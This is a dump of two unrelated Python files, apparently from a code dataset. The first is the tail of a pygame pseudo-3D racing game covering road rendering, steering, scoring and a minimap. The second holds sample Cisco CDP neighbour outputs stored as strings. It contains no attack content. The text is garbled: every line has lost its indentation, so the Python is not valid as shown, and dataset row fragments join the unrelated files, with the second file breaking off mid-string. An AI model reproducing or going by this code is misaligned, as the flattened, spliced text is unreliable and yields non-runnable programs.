xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
#xcl1 = xc1 - self.lane_w
#xcl2 = xc2 + self.lane_w
#xcl3 = xc3 - self.lane_w
#xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
#print '=' * 80
#print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
#print 'segbi', segbi, ' / ', seg_n
self.player_seg = self.segments[segbi]
self.base_seg = self.segments[(segbi + 2) % seg_n]
# for test
#self.base_seg['color'] = FP_COLORS['FINISH']
b_curve = self.player_seg.get('curve', 0.0)
#b_percent = 0.5
b_percent = self.util_curve_percent_remaining(self.position,
self.seg_len)
dx_curve = - (b_curve * b_percent)
x_curve = 0
#print 'b_curve', b_curve
#print 'world z', self.player_seg['p1']['world']['z']
#print 'world y', self.player_seg['p1']['world'].get('y', 0.0)
# clear the sprites cache
self.rd_sprt_cache = []
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#'''
'''
# for test
if i < 10:
print '>>> ', i
print 'curve', seg.get('curve', 0.0)
print 'world z', seg['p1']['world']['z']
print 'world y', seg['p1']['world'].get('y', 0.0)
#print '-' * 30
'''
'''
#x#
if seg['index'] < segbi:
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
else:
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
'''
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
'''
#x#
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
'''
# for curve
xc1 = xc1 - x_curve
xc2 = xc2 - x_curve
xc3 = xc3 - x_curve - dx_curve
xc4 = xc4 - x_curve - dx_curve
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = xcr1 - x_curve
xcr2 = xcr2 - x_curve
xcr3 = xcr3 - x_curve - dx_curve
xcr4 = xcr4 - x_curve - dx_curve
x_curve = x_curve + dx_curve
dx_curve = dx_curve + seg.get('curve', 0.0)
# for hills
yw1 = seg['p1']['world'].get('y', 0.0)
yw2 = seg['p2']['world'].get('y', 0.0)
yc1 = yc - yw1
yc2 = yc - yw2
#print yw1, yw2
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc1, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc2, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
# for test
if i < 10:
print xs1, ys1, xs2, ys2
print xs4, ys4, xs3, ys3
print '-' * 30
'''
# grass
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
# road
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
# for test
#self.pygm.draw.circle(self.surf, consts.BLUE,
# (int(xsr1), 116 - int(ys1)),
# 3, 0)
# render road sprites
# TODO: check if this seg is looped
seg_scale = self.geo_prjc_scale(self.d, zc1)
x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale
#x_sprt = (xs1 + xs2) / 2.0
#y_sprt = (ys1 + ys3) / 2.0
x_dt = x_rnd * seg_scale
x_pos = [xsr1, xsr2,
(xsr1 + xsl1) / 2.0,
(xsr2 + xsl2) / 2.0,
xsl1, xsl2]
#x_sprt = xsr1
x_sprt = (xsr1 + xsl1) / 2.0
#x_sprt = random.choice(x_pos)
x_i = random.randint(0, len(x_pos) - 1) # NOTE: not used now !!
##x_i = 2
y_sprt = ys1
scale_sprt = seg_scale * 8.0#10.0#2.0
obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
if obj:
self.rd_sprt_cache.append(obj)
# render the sprites with right order
for obj in self.rd_sprt_cache[::-1]:
self.disp_add(obj)
def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
#d = 200#100#240#50#
#a = 60
#pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
#pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]
#pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]
# reflect the y-
d = 116
pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
c = utils.clr_from_str(color)
try:
self.pygm.draw.polygon(self.surf, c, pnts)
except Exception as e:
#print '-' * 60
pass
def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
sprts = seg.get('sprites')
if not sprts:
return None
for i, info in enumerate(sprts):
sprt = info['name']
obj_k = str(seg['index']) + '_' + str(i) + '_' + sprt
obj = info.get('obj')
'''
# TODO: <1>
if not obj:
obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0])
info['obj'] = obj
self.disp_add(obj)
'''
# <2>
if obj:
self.disp_del(obj)
# NOTE: objs will be deleted at rd_sprts_del_all_objs()
##del self.rd_sprt_objs[obj_k]
img = FP_ROAD_SPRTS[sprt]['imgs'][0]
obj = FPSptRdSprts.create_by_img(img)
# avoid: pygame.error: Width or height is too large
if scale > 500:
#print 'scale <1>', scale
pass
else:
try:
obj.scale(scale)
except:
#print 'scale <2>', scale
pass
x_i_saved = info.get('x_i')
#if not x_i_saved:
# info['x_i'] = x_i
# x_i_saved = x_i
obj.rect.top = 116 - y + 240 - obj.rect.height
obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2
#obj.scale(scale)
info['obj'] = obj
##self.disp_add(obj) # NOTE: render out here
self.rd_sprt_objs[obj_k] = obj # for reset to delete all
# NOTE: only show one
break
return obj
def handle_event(self, events, *args, **kwargs):
#print '>>> ', events
if not self.flag_check_event:
return events
else:
return self.check_key(events)
def key_to_di(self, k):
if k == self.pglc.K_UP:
return 0
elif k == self.pglc.K_RIGHT:
return 1
elif k == self.pglc.K_DOWN:
return 2
elif k == self.pglc.K_LEFT:
return 3
else:
return None
def key_to_di_b(self, k):
if k == self.pglc.K_f or k == self.pglc.K_j:
return 0
elif k == self.pglc.K_k:
return 1
elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:
return 2
elif k == self.pglc.K_d:
return 3
else:
return None
def check_key(self, events):
#print id(events)
r_events = []
e_keys_up = []
e_keys_dn = []
for event in events:
#print event
if event.type == self.pglc.KEYUP:
di = self.key_to_di(event.key)
if di is None:
di = self.key_to_di_b(event.key)
if di is not None:
e_keys_up.append(di)
else:
r_events.append(event)
elif event.type == self.pglc.KEYDOWN:
di = self.key_to_di(event.key)
if di is None:
di = self.key_to_di_b(event.key)
if di is not None:
e_keys_dn.append(di)
else:
r_events.append(event)
else:
r_events.append(event)
self.e_keys_up = e_keys_up
self.e_keys_dn = e_keys_dn
return r_events
def refresh__1(self, fps_clock, *args, **kwargs):
#print '>>> refresh'
#'''
if self.player_di == 3: # <
self.player_x -= 9
if self.player_x < -1000:
self.player_di = 1
elif self.player_di == 1:
self.player_x += 19
if self.player_x > 1000:
self.player_di = 3
#'''
#'''
self.position += 10.0#5.0#1.0
self.position += random.randint(2, 10)
if self.position > self.track_len:
self.position -= self.track_len
#'''
self.draw_on()
self.rd_seg_render()
def refresh(self, fps_clock, *args, **kwargs):
self.check_player_di(self.e_keys_dn, self.e_keys_up)
self.draw_on()
self.rd_seg_render()
self.update_world()
self.check_if_car_out_road()
self.check_score()
self.check_tm()
self.update_bg()
def check_player_di(self, e_keys_dn, e_keys_up):
if 0 in e_keys_dn:
self.player_go = 1
elif 2 in e_keys_dn:
self.player_go = 2
if 1 in e_keys_dn:
self.player_di = 1
elif 3 in e_keys_dn:
self.player_di = 3
if 0 in e_keys_up:
if self.player_go != 2:
self.player_go = 0
if 2 in e_keys_up:
if self.player_go != 1:
self.player_go = 0
if 1 in e_keys_up:
if self.player_di != 3:
self.player_di = 0
if 3 in e_keys_up:
if self.player_di != 1:
self.player_di = 0
def update_world(self):
if self.player_go == 1:
self.speed += self.speed_dt_up
elif self.player_go == 2:
self.speed -= self.speed_dt_dn
else:
self.speed -= self.speed_dt_na
# if on the grass, slow down
if self.player_x < -self.road_w / 2 or \
self.player_x > self.road_w / 2:
self.speed -= 10
if self.speed < 0.0:
self.speed = 0.0
elif self.speed > self.speed_max:
self.speed = self.speed_max
self.position += self.speed
if self.position > self.track_len:
self.position -= self.track_len
# for check score
self.last_seg_i = 0
self.game_over = True
self.game_score = 1.0
if self.player_di == 1:
#self.player_x += self.player_x_dt
self.player_x += self.speed / 5 + 20
elif self.player_di == 3:
#self.player_x -= self.player_x_dt
self.player_x -= self.speed / 5 + 20
else:
pass
p_curve = self.player_seg.get('curve', 0.0)
#print 'p_curve', p_curve
p_dt = self.speed * p_curve * self.centrifugal
#print p_dt
#self.player_x -= p_dt
self.player_x += p_dt
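    # Note: the curve push above is just speed * curve * centrifugal, e.g. at
    # speed 300.0 on a curve of 4.0 with centrifugal 0.1 the car is shifted by
    # 120 world units per frame, so sharper curves need active steering.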
def check_if_car_out_road(self):
# decrease score when go out the road
if self.player_x < -self.road_w / 2 or \
self.player_x > self.road_w / 2:
if self.score > 0:
self.score -= 1
#self.score -= 1
#if self.score < 0:
# self.score = 0
self.game_over = True
self.game_score = -1.0
def check_score(self):
# make sure we check score once for a segment
seg_i = self.player_seg['index']
if seg_i > self.last_seg_i:
self.last_seg_i = seg_i
else:
return
# NOTE: here we should use the segment just under the car
#sprts = self.player_seg['sprites']
sprts = self.base_seg['sprites']
if not sprts:
return
# NOTE: we now only use the first sprite !
sprt = sprts[0]
x_i = sprt.get('x_i')
if x_i is None:
return
scr = sprt.get('score')
if not scr: # None or 0
return
obj = sprt.get('obj')
if not obj: # None or 0
return
#rd_w_half = self.road_w / 2
#x_pos = [rd_w_half + self.lane_w,
# rd_w_half - self.lane_w]
sprt_x = obj.rect.left
sprt_w = obj.rect.width
car_x = self.player_x
car_w = self.car.rect.width * 2
sprt_at = 10000
if x_i == 0:
sprt_at = 40
elif x_i == 1:
sprt_at = -40
elif x_i == 2:
sprt_at = 580
elif x_i == 3:
sprt_at = -580
elif x_i == 4:
sprt_at = 1100
elif x_i == 5:
sprt_at = -1100
#print 'sprt_x', sprt_x
#print 'car_x', car_x
#print 'car_w', car_w
#print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x + car_w / 2)
#print '-' * 40
w_half = car_w / 2 + sprt_w / 2
#if (car_x + car_w / 2) < sprt_x < (car_x + car_w / 2):
if (car_x - w_half) < sprt_at < (car_x + w_half):
self.score += scr
def check_tm(self):
if self.position > self.seg_len * 2:
if self.tm_start == 0.0:
self.tm_start = time.time()
self.tm_end = self.tm_start
else:
self.tm_end = time.time()
self.tm_last_once = self.tm_end - self.tm_start
else:
self.tm_start = 0.0
#self.tm_end = 0.0
def update_bg(self):
# always move the cloud
for sky in self.bg_sky:
sky.rect.left -= 1#self.sky_speed
if sky.rect.left + sky.rect.width < 0:
sky.rect.left += sky.rect.width * 2
if sky.rect.left - sky.rect.width > 0:
sky.rect.left -= sky.rect.width * 2
if self.speed <= 0.0:
return
p_curve = self.player_seg.get('curve', 0.0)
#p_curve = 3
#print 'p_curve', p_curve
p_dt = self.speed * p_curve * self.centrifugal
#p_dt = 40
#p_dt = -40
#p_dt = random.randint(-100, 100)
#print p_dt
for sky in self.bg_sky:
#print sky
sky.rect.left += int(self.sky_speed * p_dt)
# always move the cloud
#sky.rect.left -= self.sky_speed
if sky.rect.left + sky.rect.width < 0:
sky.rect.left += sky.rect.width * 2
if sky.rect.left - sky.rect.width > 0:
sky.rect.left -= sky.rect.width * 2
for hill in self.bg_hills:
hill.rect.left += int(self.hill_speed * p_dt)
if hill.rect.left + hill.rect.width < 0:
hill.rect.left += hill.rect.width * 2
if hill.rect.left - hill.rect.width > 0:
hill.rect.left -= hill.rect.width * 2
for trees in self.bg_trees:
trees.rect.left += int(self.tree_speed * p_dt)
if trees.rect.left + trees.rect.width < 0:
trees.rect.left += trees.rect.width * 2
if trees.rect.left - trees.rect.width > 0:
trees.rect.left -= trees.rect.width * 2
class FPSptRoadMap(sptdraw.SptDrawBase):
def __init__(self, size, segs, rad, *args, **kwargs):
super(FPSptRoadMap, self).__init__(size)
self.segs = segs
self.rad = rad
#self.fill(consts.WHITE)
self.draw_segs(self.segs, self.rad)
def xy_to_cntr(self, x, y):
return [self.size[0] / 2 + x, self.size[1] / 2 - y]
def cv_to_engl(self, curve, rad):
a = float(curve) / rad
#a *= 10.0
#print a
s = 1.0
if a < 0.0:
s = -1.0
if a < -1.0:
a = -1.0
elif a > 1.0:
a = 1.0
#tht_d = math.acos(a)
tht_d = math.asin(a)
return tht_d
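    # For example, an accumulated curve of 4.0 with rad = 200 (the segment
    # length) gives a = 0.02, so the map heading turns by asin(0.02) ~ 0.02 rad
    # (about 1.15 degrees) for that stretch of road.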
def get_segs_pnts(self, segs, rad):
pnts = []
x, y = 0.0, 0.0
tht = 0.0
rad_m = 4.0#2.0#1.0#
cv_s = 0
cv_l = 0.0
pnts.append([x, y])
for seg in segs:
curve = seg.get('curve', 0.0)
if curve == 0.0:
if cv_s:
tht_d = self.cv_to_engl(cv_l, rad)
#tht += tht_d
tht -= tht_d
rad_m = 20.0#10.0#50.0#
cv_s = 0
cv_l = 0.0
else:
rad_m = 0.5#1.0#0.1#
else:
if cv_s:
cv_l += curve
else:
cv_s = 1
continue
x += rad_m * math.cos(tht)
y += rad_m * math.sin(tht)
pnts.append([x, y])
#print pnts
return pnts
def get_segs_pnts_1(self, segs, rad):
pnts = []
x, y = 0.0, 0.0
tht = 0.0
rad_m = 4.0#2.0#1.0#
pnts.append([x, y])
for seg in segs:
curve = seg.get('curve', 0.0)
if curve == 0.0:
rad_m = 1.0#0.1#
else:
a = float(curve) / rad
a *= 10.0
#print a
if a < -1.0:
a = -1.0
elif a > 1.0:
a = 1.0
#tht_d = math.acos(a)
tht_d = math.asin(a) # TODO:
tht += tht_d
rad_m = 10.0#50.0#
x += rad_m * math.cos(tht)
y += rad_m * math.sin(tht)
pnts.append([x, y])
#print pnts
return pnts
def draw_segs(self, segs, rad):
pnts = self.get_segs_pnts(segs, rad)
#print pnts
if len(pnts) <= 1:
return
#if len(pnts) > 0:
# pnts.append(pnts[0])
cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
c = utils.clr_from_str(FP_COLOR_BLUE)
#self.pygm.draw.polygon(self.surf, c, cpnts)
self.pygm.draw.lines(self.surf, c, False, cpnts, 3)
class FPSptProgress(sptdraw.SptDrawBase):
def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
super(FPSptProgress, self).__init__(size)
self.c_bg = c_bg
self.c_prog = c_prog
self.progress(0.0)
def progress(self, prog):
y = self.size[1] * prog
self.fill(self.c_bg)
#self.pygm.draw.rect(self.surf, consts.GREEN,
# [1, 0, self.size[0] - 2, y])
# from down to up
self.pygm.draw.rect(self.surf, self.c_prog,
[1, self.size[1] - y,
self.size[0] - 2, y])
class FPStraight(pygm.PyGMSprite):
def __init__(self, cfg, *args, **kwargs):
super(FPStraight, self).__init__()
self.cfg = cfg
self.bg_sky1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['SKY'])
self.bg_sky1.rect.top = 0
self.bg_sky1.rect.left = 0
self.disp_add(self.bg_sky1)
self.bg_sky2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['SKY'])
self.bg_sky2.rect.top = 0
self.bg_sky2.rect.left = self.bg_sky1.rect.width
self.disp_add(self.bg_sky2)
self.bg_hills1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['HILLS'])
self.bg_hills1.rect.top = 0
self.bg_hills1.rect.left = 0
self.disp_add(self.bg_hills1)
self.bg_hills2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['HILLS'])
self.bg_hills2.rect.top = 0
self.bg_hills2.rect.left = self.bg_hills1.rect.width
self.disp_add(self.bg_hills2)
self.bg_trees1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['TREES'])
self.bg_trees1.rect.top = 0
self.bg_trees1.rect.left = 0
self.disp_add(self.bg_trees1)
self.bg_trees2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['TREES'])
self.bg_trees2.rect.top = 0
self.bg_trees2.rect.left = self.bg_trees1.rect.width
self.disp_add(self.bg_trees2)
self.car = FPSptSprts('img_flatpath/images/sprites.png',
IMG_POS_SPRITES['PLAYER_STRAIGHT'])
#print self.road.cameraDepth/self.road.playerZ
#self.car.scale(self.road.cameraDepth/self.road.playerZ)
self.car.scale(2)
self.car.rect.top = 400
self.car.rect.left = (640 - self.car.rect.width) / 2
##self.disp_add(self.car) # car disp add after road
#self.road = FPSptRoad((640, 240), self.cfg)
self.road = FPSptRoadB((640, 240), self.cfg,
car=self.car,
bg_sky=[self.bg_sky1, self.bg_sky2],
bg_hills=[self.bg_hills1, self.bg_hills2],
bg_trees=[self.bg_trees1, self.bg_trees2])
self.road.rect.top = 240
self.road.rect.left = 0
self.disp_add(self.road)
self.disp_add(self.car)
self.rdmap = FPSptRoadMap((480, 480),
self.road.rd_get_segs(whole=True),
self.road.seg_len)
self.rdmap.rect.top = 0
self.rdmap.rect.left = 80
self.rdmap.rotate(90)
self.disp_add(self.rdmap)
self.rdpsd = pygm.SptLbl(str(int(self.road.speed)),
c=consts.GREEN, font_size=12)
self.rdpsd.rect.top = 456
self.rdpsd.rect.left = 312
self.disp_add(self.rdpsd)
self.scr = pygm.SptLbl(str(int(self.road.score)),
c=consts.RED, font_size=16)
self.scr.rect.top = 40#454
self.scr.rect.left = 600
self.disp_add(self.scr)
self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)),
c=consts.YELLOW, font_size=16)
self.tm_once.rect.top = 20#454
self.tm_once.rect.left = 600
self.disp_add(self.tm_once)
self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
self.prog.rect.top = 70#340
self.prog.rect.left = 610
#self.prog.rotate(180)
self.disp_add(self.prog)
self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
self.spd.rect.top = 70#340
self.spd.rect.left = 602
#self.spd.rotate(180)
self.disp_add(self.spd)
def rdmap_hide(self):
self.rdmap.hide()
def rdmap_reset(self):
self.rdmap.clear()
self.rdmap.draw_segs(self.road.rd_get_segs(whole=True),
self.road.seg_len)
self.rdmap.rotate(90)
def road_reset(self):
self.road.rd_reset()
self.rdmap_reset()
def road_reset_keep_segs(self):
self.road.rd_reset(init=False, keep_segs=True)
def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
segs_file = utils.dir_abs(segs_file, __file__)
self.road.rd_reset(init=False, keep_segs=False,
segs_file=segs_file)
self.rdmap_reset()
def road_segs_to_file(self, segs_file=None):
if not segs_file:
segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
segs_file = utils.dir_abs(segs_file, __file__)
self.road.rd_seg_json_save(segs_file)
def handle_event(self, events, *args, **kwargs):
#return events
r_events = []
for event in events:
#print event
if event.type == self.pglc.KEYUP:
k = event.key
if k == self.pglc.K_SPACE:
# hide / show road map
self.rdmap_hide()
elif k == self.pglc.K_RETURN:
self.road_reset()
elif k == self.pglc.K_TAB:
self.road_reset_keep_segs()
elif k == self.pglc.K_BACKSPACE:
self.road_reset_from_file()
elif k == self.pglc.K_SLASH:
self.road_segs_to_file()
else:
r_events.append(event)
elif event.type == self.pglc.KEYDOWN:
r_events.append(event)
else:
r_events.append(event)
return r_events
def refresh(self, fps_clock, *args, **kwargs):
self.rdpsd.lbl_set(str(int(self.road.speed)))
self.scr.lbl_set(str(int(self.road.score)))
self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
prg = self.road.position / self.road.track_len
self.prog.progress(prg)
spdc = self.road.speed / self.road.speed_max
self.spd.progress(spdc)
class FPSceneA(pygm.PyGMScene):
def __init__(self, *args, **kwargs):
super(FPSceneA, self).__init__(*args, **kwargs)
self.straight = FPStraight({})
self.straight.rect.top = 0
self.straight.rect.left = 0
self.disp_add(self.straight)
        '''
self.sn1 = SptTmpx((200, 200))
self.sn1.rect.top = 100
self.sn1.rect.left = 100
self.disp_add(self.sn1)
'''
'''
self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32)
self.lb1.rect.top = 200
self.lb1.rect.left = 100
self.disp_add(self.lb1)
'''
def handle_event(self, events, *args, **kwargs):
return events
def refresh(self, fps_clock, *args, **kwargs):
pass
class GMFlatpath(pygm.PyGMGame):
def __init__(self, title, winw, winh, *args, **kwargs):
super(GMFlatpath, self).__init__(title, winw, winh)
bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__)
#self.bk = pygm.SptImg('data/img_bk_1.jpg')
self.bk = pygm.SptImg(bk_im)
self.bk.rect.top = -230
self.bk.rect.left = -230
#self.disp_add(self.bk)
self.scn1 = FPSceneA()
self.disp_add(self.scn1)
road_file = kwargs.get('road_file')
if road_file:
self.scn1.straight.road_reset_from_file(segs_file=road_file)
def main():
#sf = GMFlatpath('flatpath <:::>', 640, 480)
sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt')
sf.mainloop()
if __name__ == '__main__':
main()
| 2.75 | 3 |
First_course/test5_base.py | laetrid/learning | 0 | 1264 | <reponame>laetrid/learning<filename>First_course/test5_base.py
#!/usr/bin/env python
sw1_show_cdp_neighbors = '''
SW1>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone
Device ID Local Intrfce Holdtme Capability Platform Port ID
R1 Fas 0/11 153 R S I 881 Fas 1
R2 Fas 0/12 123 R S I 881 Fas 1
R3 Fas 0/13 129 R S I 881 Fas 1
R4 Fas 0/14 173 R S I 881 Fas 1
R5 Fas 0/15 144 R S I 881 Fas 1
'''
sw1_show_cdp_neighbors_detail = '''
SW1> show cdp neighbors detail
--------------------------
Device ID: R1
Entry address(es):
IP address: 10.1.1.1
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1
Holdtime: 153 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R2
Entry address(es):
IP address: 10.1.1.2
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1
Holdtime: 123 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R3
Entry address(es):
IP address: 10.1.1.3
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1
Holdtime: 129 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R4
Entry address(es):
IP address: 10.1.1.4
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1
Holdtime: 173 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R5
Entry address(es):
IP address: 10.1.1.5
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1
Holdtime: 144 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
'''
r1_show_cdp_neighbors = '''
R1>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/11
'''
r1_show_cdp_neighbors_detail = '''
R1>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r2_show_cdp_neighbors = '''
R2>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/12
'''
r2_show_cdp_neighbors_detail = '''
R2>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r3_show_cdp_neighbors = '''
R3>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/13
'''
r3_show_cdp_neighbors_detail = '''
R3>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
